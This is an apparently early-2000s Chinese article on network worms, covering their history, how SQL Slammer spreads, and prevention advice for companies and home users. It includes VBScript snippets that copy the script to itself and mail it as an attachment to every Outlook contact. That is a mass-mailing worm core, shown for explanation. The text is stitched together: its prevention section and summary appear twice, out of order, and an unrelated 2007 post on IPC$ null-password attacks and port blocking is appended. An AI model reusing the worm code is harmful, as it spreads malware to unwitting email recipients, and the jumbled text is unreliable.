(1)購合適的殺毒軟件!網(wǎng)絡(luò)蠕蟲病毒的發(fā)展已經(jīng)使傳統(tǒng)的殺毒軟件的“文件級(jí)實(shí)時(shí)監(jiān)控系統(tǒng)”落伍,殺毒軟件必須向內(nèi)存實(shí)時(shí)監(jiān)控和郵件實(shí)時(shí)監(jiān)控發(fā)展!另外面對(duì)防不勝防的網(wǎng)頁病毒,也使得用戶對(duì)殺毒軟件的要求越來越高!在殺毒軟件市場上,賽門鐵克公司的norton系列殺毒軟件在全球具有很大的比例!經(jīng)過多項(xiàng)測試,norton殺毒系列軟件腳本和蠕蟲阻攔技術(shù)能夠阻擋大部分電子郵件病毒,而且對(duì)網(wǎng)頁病毒也有相當(dāng)強(qiáng)的防范能力!目前國內(nèi)的殺毒軟件也具有了相當(dāng)高的水平。像瑞星,kv系列等殺毒軟件,在殺毒軟件的同時(shí)整合了防火強(qiáng)功能,從而對(duì)蠕蟲兼木馬程序有很大克制作用。
(2)經(jīng)常升級(jí)病毒庫,殺毒軟件對(duì)病毒的查殺是以病毒的特征碼為依據(jù)的,而病毒每天都層出不窮,尤其是在網(wǎng)絡(luò)時(shí)代,蠕蟲病毒的傳播速度快,變種多,所以必須隨時(shí)更新病毒庫,以便能夠查殺最新的病毒!
(3)提高防殺毒意識(shí).不要輕易去點(diǎn)擊陌生的站點(diǎn),有可能里面就含有惡意代碼!
當(dāng)運(yùn)行IE時(shí),點(diǎn)擊“工具→Internet選項(xiàng)→安全→ Internet區(qū)域的安全級(jí)別”,把安全級(jí)別由“中”改為“高” 。因?yàn)檫@一類網(wǎng)頁主要是含有惡意代碼的ActiveX或Applet、 JavaScript的網(wǎng)頁文件 ,所以在IE設(shè)置中將ActiveX插件和控件、Java腳本等全部禁止就可以大大減少被網(wǎng)頁惡意代碼感染的幾率。具體方案是:在IE窗口中點(diǎn)擊“工具”→“Internet選項(xiàng)”,在彈出的對(duì)話框中選擇“安全”標(biāo)簽,再點(diǎn)擊“自定義級(jí)別”按鈕,就會(huì)彈出“安全設(shè)置”對(duì)話框,把其中所有ActiveX插件和控件以及與Java相關(guān)全部選項(xiàng)選擇“禁用”。但是,這樣做在以后的網(wǎng)頁瀏覽過程中有可能會(huì)使一些正常應(yīng)用ActiveX的網(wǎng)站無法瀏覽。
(4)不隨意查看陌生郵件,尤其是帶有附件的郵件,由于有的病毒郵件能夠利用ie和outlook的漏洞自動(dòng)執(zhí)行,所以計(jì)算機(jī)用戶需要升級(jí)ie和outlook程序,及常用的其他應(yīng)用程序!
三、小結(jié)
網(wǎng)絡(luò)蠕蟲病毒作為一種互聯(lián)網(wǎng)高速發(fā)展下的一種新型病毒,必將對(duì)網(wǎng)絡(luò)產(chǎn)生巨大的危險(xiǎn)。在防御上,已經(jīng)不再是由單獨(dú)的殺毒廠商所能夠解決,而需要網(wǎng)絡(luò)安全公司,系統(tǒng)廠商,防病毒廠商及用戶共同參與,構(gòu)筑全方位的防范體系!
蠕蟲和黑客技術(shù)的結(jié)合,使得對(duì)蠕蟲的分析,檢測和防范具有一定的難度,同時(shí)對(duì)蠕蟲的網(wǎng)絡(luò)傳播性,網(wǎng)絡(luò)流量特性建立數(shù)學(xué)模型也是有待研究的工作!
本文根據(jù)蠕蟲病毒的發(fā)作機(jī)制,將其分為利用系統(tǒng)級(jí)別漏洞(主動(dòng)傳播)和利用社會(huì)工程學(xué)(欺騙傳播)兩種,并從用戶角度中將蠕蟲病毒分為針對(duì)企業(yè)網(wǎng)絡(luò)和個(gè)人用戶2類,從企業(yè)用戶和個(gè)人用戶兩個(gè)方面探討蠕蟲病毒的特征和一些防范措施!
一、蠕蟲病毒的定義
1.蠕蟲病毒的定義
計(jì)算機(jī)病毒自出現(xiàn)之日起,就成為計(jì)算機(jī)的一個(gè)巨大威脅,而當(dāng)網(wǎng)絡(luò)迅速發(fā)展的時(shí)候,蠕蟲病毒引起的危害開始顯現(xiàn)!從廣義上定義,凡能夠引起計(jì)算機(jī)故障,破壞計(jì)算機(jī)數(shù)據(jù)的程序統(tǒng)稱為計(jì)算機(jī)病毒。所以從這個(gè)意義上說,蠕蟲也是一種病毒!但是蠕蟲病毒和一般的病毒有著很大的區(qū)別。對(duì)于蠕蟲,現(xiàn)在還沒有一個(gè)成套的理論體系,一般認(rèn)為,蠕蟲是一種通過網(wǎng)絡(luò)傳播的惡性病毒,它具有病毒的一些共性,如傳播性,隱蔽性,破壞性等等,同時(shí)具有自己的一些特征,如不利用文件寄生(有的只存在于內(nèi)存中),對(duì)網(wǎng)絡(luò)造成拒絕服務(wù),以及和黑客技術(shù)相結(jié)合等等!在產(chǎn)生的破壞性上,蠕蟲病毒也不是普通病毒所能比擬的,網(wǎng)絡(luò)的發(fā)展使得蠕蟲可以在短短的時(shí)間內(nèi)蔓延整個(gè)網(wǎng)絡(luò),造成網(wǎng)絡(luò)癱瘓!
根據(jù)使用者情況可將蠕蟲病毒分為2類,一種是面向企業(yè)用戶和局域網(wǎng)而言,這種病毒利用系統(tǒng)漏洞,主動(dòng)進(jìn)行攻擊,可以對(duì)整個(gè)互聯(lián)網(wǎng)可造成癱瘓性的后果!以“紅色代碼”,“尼姆達(dá)”,以及最新的“sql蠕蟲王”為代表。另外一種是針對(duì)個(gè)人用戶的,通過網(wǎng)絡(luò)(主要是電子郵件,惡意網(wǎng)頁形式)迅速傳播的蠕蟲病毒,以愛蟲病毒,求職信病毒為例.在這兩類中,第一類具有很大的主動(dòng)攻擊性,而且爆發(fā)也有一定的突然性,但相對(duì)來說,查殺這種病毒并不是很難。第二種病毒的傳播方式比較復(fù)雜和多樣,少數(shù)利用了微軟的應(yīng)用程序的漏洞,更多的是利用社會(huì)工程學(xué)()對(duì)用戶進(jìn)行欺騙和誘使,這樣的病毒造成的損失是非常大的,同時(shí)也是很難根除的,比如求職信病毒,在2001年就已經(jīng)被各大殺毒廠商發(fā)現(xiàn),但直到2002年底依然排在病毒危害排行榜的首位就是證明!出得在接下來的內(nèi)容中,將分別分析這兩種病毒的一些特征及防范措施!
2.蠕蟲病毒與一般病毒的異同
蠕蟲也是一種病毒,因此具有病毒的共同特征。一般的病毒是需要的寄生的,它可以通過自己指令的執(zhí)行,將自己的指令代碼寫到其他程序的體內(nèi),而被感染的文件就被稱為”宿主”,例如,windows下可執(zhí)行文件的格式為pe格式(Portable Executable),當(dāng)需要感染pe文件時(shí),在宿主程序中,建立一個(gè)新節(jié),將病毒代碼寫到新節(jié)中,修改的程序入口點(diǎn)等,這樣,宿主程序執(zhí)行的時(shí)候,就可以先執(zhí)行病毒程序,病毒程序運(yùn)行完之后,在把控制權(quán)交給宿主原來的程序指令。可見,病毒主要是感染文件,當(dāng)然也還有像DIRII這種鏈接型病毒,還有引導(dǎo)區(qū)病毒。引導(dǎo)區(qū)病毒他是感染磁盤的引導(dǎo)區(qū),如果是軟盤被感染,這張軟盤用在其他機(jī)器上后,同樣也會(huì)感染其他機(jī)器,所以傳播方式也是用軟盤等方式。
蠕蟲一般不采取利用pe格式插入文件的方法,而是復(fù)制自身在互聯(lián)網(wǎng)環(huán)境下進(jìn)行傳播,病毒的傳染能力主要是針對(duì)計(jì)算機(jī)內(nèi)的文件系統(tǒng)而言,而蠕蟲病毒的傳染目標(biāo)是互聯(lián)網(wǎng)內(nèi)的所有計(jì)算機(jī).局域網(wǎng)條件下的共享文件夾,電子郵件email,網(wǎng)絡(luò)中的惡意網(wǎng)頁,大量存在著漏洞的服務(wù)器等都成為蠕蟲傳播的良好途徑。網(wǎng)絡(luò)的發(fā)展也使得蠕蟲病毒可以在幾個(gè)小時(shí)內(nèi)蔓延全球!而且蠕蟲的主動(dòng)攻擊性和突然爆發(fā)性將使得人們手足無策!
普通病毒 蠕蟲病毒
存在形式 寄存文件 獨(dú)立程序
傳染機(jī)制 宿主程序運(yùn)行 主動(dòng)攻擊
傳染目標(biāo) 本地文件 網(wǎng)絡(luò)計(jì)算機(jī)
可以預(yù)見,未來能夠給網(wǎng)絡(luò)帶來重大災(zāi)難的主要必定是網(wǎng)絡(luò)蠕蟲!
3.蠕蟲的破壞和發(fā)展趨勢
1988年一個(gè)由美國CORNELL大學(xué)研究生莫里斯編寫的蠕蟲病毒蔓延造成了數(shù)千臺(tái)計(jì)算機(jī)停機(jī),蠕蟲病毒開始現(xiàn)身網(wǎng)絡(luò);而后來的紅色代碼,尼姆達(dá)病毒瘋狂的時(shí)候,造成幾十億美元的損失;北京時(shí)間2003年1月26日, 一種名為“2003蠕蟲王”的電腦病毒迅速傳播并襲擊了全球,致使互聯(lián)網(wǎng)網(wǎng)路嚴(yán)重堵塞,作為互聯(lián)網(wǎng)主要基礎(chǔ)的域名服務(wù)器(DNS)的癱瘓?jiān)斐删W(wǎng)民瀏覽互聯(lián)網(wǎng)網(wǎng)頁及收發(fā)電子郵件的速度大幅減緩,同時(shí)銀行自動(dòng)提款機(jī)的運(yùn)作中斷, 機(jī)票等網(wǎng)絡(luò)預(yù)訂系統(tǒng)的運(yùn)作中斷,信用卡等收付款系統(tǒng)出現(xiàn)故障!專家估計(jì),此病毒造成的直接經(jīng)濟(jì)損失至少在12億美元以上!
病毒名稱 持續(xù)時(shí)間 造成損失莫里斯蠕蟲 1988年
6000多臺(tái)計(jì)算機(jī)停機(jī),直接經(jīng)濟(jì)損失達(dá)9600萬美元! 美麗殺手
1999年 政府部門和一些大公司緊急關(guān)閉了網(wǎng)絡(luò)服務(wù)器,
經(jīng)濟(jì)損失超過12億美元!愛蟲病毒
2000年5月至今
眾多用戶電腦被感染,損失超過100億美元以上 紅色代碼
2001年7月 網(wǎng)絡(luò)癱瘓,直接經(jīng)濟(jì)損失超過26億美元 求職信
2001年12月至今 大量病毒郵件堵塞服務(wù)器,損失達(dá)數(shù)百億美元 蠕蟲王
2003年1月 網(wǎng)絡(luò)大面積癱瘓,銀行自動(dòng)提款機(jī)運(yùn)做中斷,直接經(jīng)濟(jì)損失超過26億美元
由表可以知道,蠕蟲病毒對(duì)網(wǎng)絡(luò)產(chǎn)生堵塞作用,并造成了巨大的經(jīng)濟(jì)損失!
通過對(duì)以上蠕蟲病毒的分析,可以知道,蠕蟲發(fā)作的一些特點(diǎn)和發(fā)展趨勢:
1.利用操作系統(tǒng)和應(yīng)用程序的漏洞主動(dòng)進(jìn)行攻擊.. 此類病毒主要是“紅色代碼”和“尼姆達(dá)”,以及至今依然肆虐的”求職信”等.由于IE瀏覽器的漏洞(Iframe Execcomand),使得感染了“尼姆達(dá)”病毒的郵件在不去手工打開附件的情況下病毒就能激活,而此前即便是很多防病毒專家也一直認(rèn)為,帶有病毒附件的郵件,只要不去打開附件,病毒不會(huì)有危害。“紅色代碼”是利用了微軟IIS服務(wù)器軟件的漏洞(idq.dll遠(yuǎn)程緩存區(qū)溢出)來傳播。Sql蠕蟲王病毒則是利用了微軟的數(shù)據(jù)庫系統(tǒng)的一個(gè)漏洞進(jìn)行大肆攻擊!
2.傳播方式多樣 如“尼姆達(dá)”病毒和”求職信”病毒,可利用的傳播途徑包括文件、電子郵件、Web服務(wù)器、網(wǎng)絡(luò)共享等等。
3.病毒制作技術(shù)與傳統(tǒng)的病毒不同的是,許多新病毒是利用當(dāng)前最新的編程語言與編程技術(shù)實(shí)現(xiàn)的,易于修改以產(chǎn)生新的變種,從而逃避反病毒軟件的搜索。另外,新病毒利用Java、ActiveX、VB Script等技術(shù),可以潛伏在HTML頁面里,在上網(wǎng)瀏覽時(shí)觸發(fā)。
4.與黑客技術(shù)相結(jié)合! 潛在的威脅和損失更大!以紅色代碼為例,感染后的機(jī)器的web目錄的\scripts下將生成一個(gè)root.exe,可以遠(yuǎn)程執(zhí)行任何命令,從而使黑客能夠再次進(jìn)入!二、網(wǎng)絡(luò)蠕蟲病毒分析和防范
蠕蟲和普通病毒不同的一個(gè)特征是蠕蟲病毒往往能夠利用漏洞,這里的漏洞或者說是缺陷,我們分為2種,軟件上的缺陷和人為上的缺陷。軟件上的缺陷,如遠(yuǎn)程溢出,微軟ie和outlook的自動(dòng)執(zhí)行漏洞等等,需要軟件廠商和用戶共同配合,不斷的升級(jí)軟件。而人為的缺陷,主要是指的是計(jì)算機(jī)用戶的疏忽。這就是所謂的社會(huì)工程學(xué)(social engineering),當(dāng)收到一封郵件帶著病毒的求職信郵件時(shí)候,大多數(shù)人都會(huì)報(bào)著好奇去點(diǎn)擊的。對(duì)于企業(yè)用戶來說,威脅主要集中在服務(wù)器和大型應(yīng)用軟件的安全上,而個(gè)人用戶而言,主要是防范第二種缺陷。
1.利用系統(tǒng)漏洞的惡性蠕蟲病毒分析
在這種病毒中,以紅色代碼,尼姆達(dá)和sql蠕蟲為代表!他們共同的特征是利用微軟服務(wù)器和應(yīng)用程序組件的某個(gè)漏洞進(jìn)行攻擊,由于網(wǎng)上存在這樣的漏洞比較普遍,使得病毒很容易的傳播!而且攻擊的對(duì)象大都為服務(wù)器,所以造成的網(wǎng)絡(luò)堵塞現(xiàn)象嚴(yán)重!
以2003年1月26號(hào)爆發(fā)的sql蠕蟲為例,爆發(fā)數(shù)小時(shí)內(nèi)席卷了全球網(wǎng)絡(luò),造成網(wǎng)絡(luò)大塞車.亞洲國家中以人口上網(wǎng)普及率達(dá)七成的韓國所受影響較為嚴(yán)重。韓國兩大網(wǎng)絡(luò)業(yè)KFT及***電訊公司,系統(tǒng)都陷入了癱瘓,其它的網(wǎng)絡(luò)用戶也被迫斷線,更為嚴(yán)重的是許多銀行的自動(dòng)取款機(jī)都無法正常工作, 美國許美國銀行統(tǒng)計(jì),該行的13000臺(tái)自動(dòng)柜員機(jī)已經(jīng)無法提供正常提款。網(wǎng)絡(luò)蠕蟲病毒開始對(duì)人們的生活產(chǎn)生了巨大的影響!
這次sql蠕蟲攻擊的是微軟數(shù)據(jù)庫系Microsoft SQL Server 2000的,利用了MSSQL2000服務(wù)遠(yuǎn)程堆棧緩沖區(qū)溢出漏洞, Microsoft SQL Server 2000是一款由Microsoft公司開發(fā)的商業(yè)性質(zhì)大型數(shù)據(jù)庫系統(tǒng)。SQL Server監(jiān)聽UDP的1434端口,客戶端可以通過發(fā)送消息到這個(gè)端口來查詢目前可用的連接方式(連接方式可以是命名管道也可以是TCP),但是此程序存在嚴(yán)重漏洞,當(dāng)客戶端發(fā)送超長數(shù)據(jù)包時(shí),將導(dǎo)致緩沖區(qū)溢出,黑客可以利用該漏洞在遠(yuǎn)程機(jī)器上執(zhí)行自己的惡意代碼。
微軟在200年7月份的時(shí)候就為這個(gè)漏洞發(fā)布了一個(gè)安全公告,但當(dāng)sql蠕蟲爆發(fā)的時(shí)候,依然有大量的裝有ms sqlserver 2000的服務(wù)器沒有安裝最新的補(bǔ)丁,從而被蠕蟲病毒所利用,蠕蟲病毒通過一段376個(gè)字節(jié)的惡意代碼,遠(yuǎn)程獲得對(duì)方主機(jī)的系統(tǒng)控制權(quán)限, 取得三個(gè)Win32 API地址,GetTickCount、socket、sendto,接著病毒使用GetTickCount獲得一個(gè)隨機(jī)數(shù),進(jìn)入一個(gè)死循環(huán)繼續(xù)傳播。在該循環(huán)中蠕蟲使用獲得的隨機(jī)數(shù)生成一個(gè)隨機(jī)的ip地址,然后將自身代碼發(fā)送至1434端口(Microsoft SQL Server開放端口),該蠕蟲傳播速度極快,其使用廣播數(shù)據(jù)包方式發(fā)送自身代碼,每次均攻擊子網(wǎng)中所有255臺(tái)可能存在機(jī)器。由于這是一個(gè)死循環(huán)的過程,發(fā)包密度僅和機(jī)器性能和網(wǎng)絡(luò)帶寬有關(guān),所以發(fā)送的數(shù)據(jù)量非常大。該蠕蟲對(duì)被感染機(jī)器本身并沒有進(jìn)行任何惡意破壞行為,也沒有向硬盤上寫文件,僅僅存在與內(nèi)存中。對(duì)于感染的系統(tǒng),重新啟動(dòng)后就可以清除蠕蟲,但是仍然會(huì)重復(fù)感染。由于發(fā)送數(shù)據(jù)包占用了大量系統(tǒng)資源和網(wǎng)絡(luò)帶寬,形成Udp Flood,感染了該蠕蟲的網(wǎng)絡(luò)性能會(huì)極度下降。一個(gè)百兆網(wǎng)絡(luò)內(nèi)只要有一兩臺(tái)機(jī)器感染該蠕蟲就會(huì)導(dǎo)致整個(gè)網(wǎng)絡(luò)訪問阻塞。
通過以上分析可以知道,此蠕蟲病毒本身除了對(duì)網(wǎng)絡(luò)產(chǎn)生拒絕服務(wù)攻擊外,并沒有別的破壞措施.但如果病毒編寫者在編寫病毒的時(shí)候加入破壞代碼,后果將不堪設(shè)想!
2.企業(yè)防范蠕蟲病毒措施
此次sql蠕蟲病毒,利用的漏洞在2002年7月份微軟的一份安全公告中就有詳細(xì)說明!而且微軟也提供了安全補(bǔ)丁提供下載,然而在時(shí)隔半年之后互聯(lián)網(wǎng)上還有相當(dāng)大的一部分服務(wù)器沒有安裝最新的補(bǔ)丁,其網(wǎng)絡(luò)管理員的安全防范意識(shí)可見一斑!
當(dāng)前,企業(yè)網(wǎng)絡(luò)主要應(yīng)用于文件和打印服務(wù)共享、辦公自動(dòng)化系統(tǒng)、企業(yè)業(yè)務(wù)(MIS)系統(tǒng)、Internet應(yīng)用等領(lǐng)域。網(wǎng)絡(luò)具有便利信息交換特性,蠕蟲病毒也可以充分利用網(wǎng)絡(luò)快速傳播達(dá)到其阻塞網(wǎng)絡(luò)目的。企業(yè)在充分地利用網(wǎng)絡(luò)進(jìn)行業(yè)務(wù)處理時(shí),就不得不考慮企業(yè)的病毒防范問題,以保證關(guān)系企業(yè)命運(yùn)的業(yè)務(wù)數(shù)據(jù)完整不被破壞。
企業(yè)防治蠕蟲病毒的時(shí)候需要考慮幾個(gè)問題:病毒的查殺能力,病毒的監(jiān)控能力,新病毒的反應(yīng)能力。而企業(yè)防毒的一個(gè)重要方面是是管理和策略。推薦的企業(yè)防范蠕蟲病毒的策略如下:
(1)加強(qiáng)網(wǎng)絡(luò)管理員安全管理水平,提高安全意識(shí)。由于蠕蟲病毒利用的是系統(tǒng)漏洞進(jìn)行攻擊,所以需要在第一時(shí)間內(nèi)保持系統(tǒng)和應(yīng)用軟件的安全性,保持各種操作系統(tǒng)和應(yīng)用軟件的更新!由于各種漏洞的出現(xiàn),使得安全不在是一種一勞永逸的事,而作為企業(yè)用戶而言,所經(jīng)受攻擊的危險(xiǎn)也是越來越大,要求企業(yè)的管理水平和安全意識(shí)也越來越高!
(2)建立病毒檢測系統(tǒng)。能夠在第一時(shí)間內(nèi)檢測到網(wǎng)絡(luò)異常和病毒攻擊。
(3)建立應(yīng)急響應(yīng)系統(tǒng),將風(fēng)險(xiǎn)減少到最小!由于蠕蟲病毒爆發(fā)的突然性,可能在病毒發(fā)現(xiàn)的時(shí)候已經(jīng)蔓延到了整個(gè)網(wǎng)絡(luò),所以在突發(fā)情況下,建立一個(gè)緊急響應(yīng)系統(tǒng)是很有必要的,在病毒爆發(fā)的第一時(shí)間即能提供解決方案。
(4)建立災(zāi)難備份系統(tǒng)。對(duì)于數(shù)據(jù)庫和數(shù)據(jù)系統(tǒng),必須采用定期備份,多機(jī)備份措施,防止意外災(zāi)難下的數(shù)據(jù)丟失!
(5)對(duì)于局域網(wǎng)而言,可以采用以下一些主要手段:A.在因特網(wǎng)接入口處安裝防火墻式防殺計(jì)算機(jī)病毒產(chǎn)品,將病毒隔離在局域網(wǎng)之外。B.對(duì)郵件服務(wù)器進(jìn)行監(jiān)控,防止帶毒郵件進(jìn)行傳播!C.對(duì)局域網(wǎng)用戶進(jìn)行安全培訓(xùn)。D.建立局域網(wǎng)內(nèi)部的升級(jí)系統(tǒng),包括各種操作系統(tǒng)的補(bǔ)丁升級(jí),各種常用的應(yīng)用軟件升級(jí),各種殺毒軟件病毒庫的升級(jí)等等!3.對(duì)個(gè)人用戶產(chǎn)生直接威脅的蠕蟲病毒
在以上分析的蠕蟲病毒中,只對(duì)安裝了特定的微軟組件的系統(tǒng)進(jìn)行攻擊,而對(duì)廣大個(gè)人用戶而言,是不會(huì)安裝iis(微軟的因特網(wǎng)服務(wù)器程序,可以使允許在網(wǎng)上提供web服務(wù))或者是龐大的數(shù)據(jù)庫系統(tǒng)的!因此上述病毒并不會(huì)直接攻擊個(gè)個(gè)人用戶的電腦(當(dāng)然能夠間接的通過網(wǎng)絡(luò)產(chǎn)生影響),但接下來分析的蠕蟲病毒,則是對(duì)個(gè)人用戶威脅最大,同時(shí)也是最難以根除,造成的損失也更大的一類蠕蟲病毒!
對(duì)于個(gè)人用戶而言,威脅大的蠕蟲病毒采取的傳播方式一般為電子郵件(Email)以及惡意網(wǎng)頁等等!
對(duì)于利用email傳播得蠕蟲病毒來說,通常利用的是社會(huì)工程學(xué)(Social Engineering),即以各種各樣的欺騙手段那誘惑用戶點(diǎn)擊的方式進(jìn)行傳播!
惡意網(wǎng)頁確切的講是一段黑客破壞代碼程序,它內(nèi)嵌在網(wǎng)頁中,當(dāng)用戶在不知情的情況下打開含有病毒的網(wǎng)頁時(shí),病毒就會(huì)發(fā)作。這種病毒代碼鑲嵌技術(shù)的原理并不復(fù)雜,所以會(huì)被很多懷不良企圖者利用,在很多黑客網(wǎng)站竟然出現(xiàn)了關(guān)于用網(wǎng)頁進(jìn)行破壞的技術(shù)的論壇,并提供破壞程序代碼下載,從而造成了惡意網(wǎng)頁的大面積泛濫,也使越來越多的用戶遭受損失。
對(duì)于惡意網(wǎng)頁,常常采取vb script和java script編程的形式!由于編程方式十分的簡單!所以在網(wǎng)上非常的流行!
Vb script和java script是由微軟操作系統(tǒng)的wsh(Windows Scripting HostWindows腳本主機(jī))解析并執(zhí)行的,由于其編程非常簡單,所以此類腳本病毒在網(wǎng)上瘋狂傳播,瘋狂一時(shí)的愛蟲病毒就是一種vbs腳本病毒,然后偽裝成郵件附件誘惑用戶點(diǎn)擊運(yùn)行,更為可怕的是,這樣的病毒是以源代碼的形式出現(xiàn)的,只要懂得一點(diǎn)關(guān)于腳本編程的人就可以修改其代碼,形成各種各樣的變種。
下面以一個(gè)簡單的腳本為例:
Set objFs=CreateObject (“Scripting.FileSystemObject”)
(創(chuàng)建一個(gè)文件系統(tǒng)對(duì)象)objFs.CreateTextFile ("C:\virus.txt", 1)
(通過文件系統(tǒng)對(duì)象的方法創(chuàng)建了TXT文件)
如果我們把這兩句話保存成為.vbs的VB腳本文件,點(diǎn)擊就會(huì)在C盤中創(chuàng)建一個(gè)TXT文件了。倘若我們把第二句改為:
objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")
就可以將自身復(fù)制到C盤virus.vbs這個(gè)文件。本句前面是打開這個(gè)腳本文件,WScript.ScriptFullName指明是這個(gè)程序本身,是一個(gè)完整的路徑文件名。GetFile函數(shù)獲得這個(gè)文件,Copy函數(shù)將這個(gè)文件復(fù)制到C盤根目錄下virus.vbs這個(gè)文件。這么簡單的兩句就實(shí)現(xiàn)了自我復(fù)制的功能,已經(jīng)具備病毒的基本特征——自我復(fù)制能力。
此類病毒往往是通過郵件傳播的,在vb script中調(diào)用郵件發(fā)送功能也非常的簡單,病毒往往采用的方法是向outlook中的地址薄中的郵件地址發(fā)送帶有包含自身的郵件來達(dá)到傳播目的,一個(gè)簡單的實(shí)例如下:
Set objOA=Wscript.CreateObject ("Outlook.Application")
(創(chuàng)建一個(gè)OUTLOOK應(yīng)用的對(duì)象)Set objMapi=objOA.GetNameSpace ("MAPI")
(取得MAPI名字空間)For i=1 to objMapi.AddressLists.Count(遍歷地址簿)
Set objAddList=objMapi.AddressLists (i)
For j=1 To objAddList. AddressEntries.Count Set
objMail=objOA.CreateItem (0) objMail.Recipients.Add
(objAddList. AddressEntries
(j))
(取得收件人郵件地址 )objMail.Subject="你好!"
(設(shè)置郵件主題,這個(gè)往往具有很大的誘惑性質(zhì))
objMail.Body="這次給你的附件,是我的新文檔!"
(設(shè)置信件內(nèi)容)objMail.Attachments.Add (“c:\virus.vbs")
(把自己作為附件擴(kuò)散出去 )objMail.Send(發(fā)送郵件)
NextNext Set objMapi=Nothing(清空objMapi變量,釋放資源)
set objOA=Nothing(清空objOA變量)
這一小段代碼的功能是向地址簿中的用戶發(fā)送電子郵件,并將自己作為附件擴(kuò)散出去。這段代碼中的第一行是創(chuàng)建一個(gè)Outlook的對(duì)象,是必不可少的。在其下是一個(gè)循環(huán),在循環(huán)中不斷地向地址簿中的電子郵件地址發(fā)送內(nèi)容相同的信件。這就是蠕蟲的傳播性。
由此可以看出,利用vb script編寫病毒是非常容易的,這就使得此類病毒的變種繁多,破壞力極大,同時(shí)也是非常難以根除的!
4.個(gè)人用戶對(duì)蠕蟲病毒的防范措施
通過上述的分析,我們可以知道,病毒并不是非常可怕的,網(wǎng)絡(luò)蠕蟲病毒對(duì)個(gè)人用戶的攻擊主要還是通過社會(huì)工程學(xué),而不是利用系統(tǒng)漏洞!所以防范此類病毒需要注意以下幾點(diǎn):
(1)購合適的殺毒軟件!網(wǎng)絡(luò)蠕蟲病毒的發(fā)展已經(jīng)使傳統(tǒng)的殺毒軟件的“文件級(jí)實(shí)時(shí)監(jiān)控系統(tǒng)”落伍,殺毒軟件必須向內(nèi)存實(shí)時(shí)監(jiān)控和郵件實(shí)時(shí)監(jiān)控發(fā)展!另外面對(duì)防不勝防的網(wǎng)頁病毒,也使得用戶對(duì)殺毒軟件的要求越來越高!在殺毒軟件市場上,賽門鐵克公司的norton系列殺毒軟件在全球具有很大的比例!經(jīng)過多項(xiàng)測試,norton殺毒系列軟件腳本和蠕蟲阻攔技術(shù)能夠阻擋大部分電子郵件病毒,而且對(duì)網(wǎng)頁病毒也有相當(dāng)強(qiáng)的防范能力!目前國內(nèi)的殺毒軟件也具有了相當(dāng)高的水平。像瑞星,kv系列等殺毒軟件,在殺毒軟件的同時(shí)整合了防火強(qiáng)功能,從而對(duì)蠕蟲兼木馬程序有很大克制作用。
(2)經(jīng)常升級(jí)病毒庫,殺毒軟件對(duì)病毒的查殺是以病毒的特征碼為依據(jù)的,而病毒每天都層出不窮,尤其是在網(wǎng)絡(luò)時(shí)代,蠕蟲病毒的傳播速度快,變種多,所以必須隨時(shí)更新病毒庫,以便能夠查殺最新的病毒!
(3)提高防殺毒意識(shí).不要輕易去點(diǎn)擊陌生的站點(diǎn),有可能里面就含有惡意代碼!
當(dāng)運(yùn)行IE時(shí),點(diǎn)擊“工具→Internet選項(xiàng)→安全→ Internet區(qū)域的安全級(jí)別”,把安全級(jí)別由“中”改為“高” 。因?yàn)檫@一類網(wǎng)頁主要是含有惡意代碼的ActiveX或Applet、 JavaScript的網(wǎng)頁文件 ,所以在IE設(shè)置中將ActiveX插件和控件、Java腳本等全部禁止就可以大大減少被網(wǎng)頁惡意代碼感染的幾率。具體方案是:在IE窗口中點(diǎn)擊“工具”→“Internet選項(xiàng)”,在彈出的對(duì)話框中選擇“安全”標(biāo)簽,再點(diǎn)擊“自定義級(jí)別”按鈕,就會(huì)彈出“安全設(shè)置”對(duì)話框,把其中所有ActiveX插件和控件以及與Java相關(guān)全部選項(xiàng)選擇“禁用”。但是,這樣做在以后的網(wǎng)頁瀏覽過程中有可能會(huì)使一些正常應(yīng)用ActiveX的網(wǎng)站無法瀏覽。
(4)不隨意查看陌生郵件,尤其是帶有附件的郵件,由于有的病毒郵件能夠利用ie和outlook的漏洞自動(dòng)執(zhí)行,所以計(jì)算機(jī)用戶需要升級(jí)ie和outlook程序,及常用的其他應(yīng)用程序!
三、小結(jié)
網(wǎng)絡(luò)蠕蟲病毒作為一種互聯(lián)網(wǎng)高速發(fā)展下的一種新型病毒,必將對(duì)網(wǎng)絡(luò)產(chǎn)生巨大的危險(xiǎn)。在防御上,已經(jīng)不再是由單獨(dú)的殺毒廠商所能夠解決,而需要網(wǎng)絡(luò)安全公司,系統(tǒng)廠商,防病毒廠商及用戶共同參與,構(gòu)筑全方位的防范體系!
蠕蟲和黑客技術(shù)的結(jié)合,使得對(duì)蠕蟲的分析,檢測和防范具有一定的難度,同時(shí)對(duì)蠕蟲的網(wǎng)絡(luò)傳播性,網(wǎng)絡(luò)流量特性建立數(shù)學(xué)模型也是有待研究的工作!
IPC$ 掃描和IPC$漏洞的防范
[ 2007-03-25 03:58:11 | 作者: sun ]
IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進(jìn)程間通信而開放的命名管道,通過提供可信任的用戶名和口令,連接雙方可以建立安全的通道并以此通道進(jìn)行加密數(shù)據(jù)的交換,從而實(shí)現(xiàn)對(duì)遠(yuǎn)程計(jì)算機(jī)的訪問。IPC$是NT/2000的一項(xiàng)新功能,它有一個(gè)特點(diǎn),即在同一時(shí)間內(nèi),兩個(gè)IP之間只允許建立一個(gè)連接。簡單點(diǎn)說就是通過你的系統(tǒng)帳號(hào)和密碼登陸你的系統(tǒng)的一個(gè)通道!而 IPC$ 并不算是一個(gè)漏洞,但因一般電腦用戶設(shè)置系統(tǒng)的密碼為空,這就成為一個(gè)可給利用的漏洞了!別人用管理員權(quán)限的帳號(hào)和空密碼登陸你的系統(tǒng)后,別人就可以開共享,執(zhí)行命令、程序、木馬,還可以刪除你的系統(tǒng)文件,危險(xiǎn)性極大!
怎樣防范
--------------------------------------------------------------------
請(qǐng)把你系統(tǒng)帳號(hào)設(shè)置為非空的密碼,而密碼不能太簡單!這樣,別人就掃描不出你的密碼!當(dāng)然要你記得住,如果自己都記不住那就。。。。
請(qǐng)加一個(gè)防火墻,把IPC相關(guān)的端口禁止外網(wǎng)訪問!
端口如下:
要禁止TCP的端口,135,139,445
要禁止UDP的端口 137 (這是讀取你機(jī)子名字的端口,MAC掃描就是掃描這個(gè)端口的)
這樣,別人利用IPC$(也就是常說的肉雞掃描)就掃不到你機(jī)子了!
